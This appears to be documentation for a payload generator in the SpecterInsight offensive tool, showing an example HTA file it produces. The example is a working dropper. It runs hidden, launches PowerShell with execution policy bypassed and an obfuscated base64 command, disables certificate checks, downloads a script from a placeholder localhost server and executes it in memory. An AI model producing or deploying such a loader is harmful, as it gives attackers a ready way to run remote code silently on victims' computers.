Description
This pipeline generates an HTML Application file to run a PowerShell cradle command as a child process.
Overview
This pipeline generates a Microsoft HTML Application file (.hta) that will run a PowerShell cradle to load a SpecterInsight payload into memory.
Example Output
<!DOCTYPE html>
<html>
<head>
<HTA:APPLICATION ID="CS"
APPLICATIONNAME="Application"
WINDOWSTATE="minimize"
MAXIMIZEBUTTON="no"
MINIMIZEBUTTON="no"
CAPTION="no"
SHOWINTASKBAR="no">
<script>
a = new ActiveXObject('Wscript.Shell');
cmd = "powershell.exe -NoExit -ExecutionPolicy Bypass -EncodedCommand \"WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7AA0ACgAkAHIAZQBxAHUAZQBzAHQAIAA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AbABvAGMAYQBsAGgAbwBzAHQALwBzAHQAYQB0AGkAYwAvAHIAZQBzAG8AdQByAGMAZQBzAC8APwBiAHUAaQBsAGQAPQBhADQAZQA2ADgAOQBiAGMAMAAwADYAMQA0ADUAYQBlAGEAMgBjADYANQA3ADMAYwBmAGUANAA2AGIAMQBmADgAJgBrAGkAbgBkAD0AcABzAF8AcwBjAHIAaQBwAHQAJwApADsADQAKACQAcgBlAHMAcABvAG4AcwBlACAAPQAgACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkAOwANAAoAJABzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAOwANAAoAJAByAGUAYQBkAGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKAAkAHMAdAByAGUAYQBtACkAOwANAAoAJABzAGMAcgBpAHAAdAAgAD0AIAAkAHIAZQBhAGQAZQByAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApAA0ACgBpAGUAeAAgACQAcwBjAHIAaQBwAHQA\"";
a.Run(cmd,0);
window.close();
</script>
</head>
<body>
</body>
</html>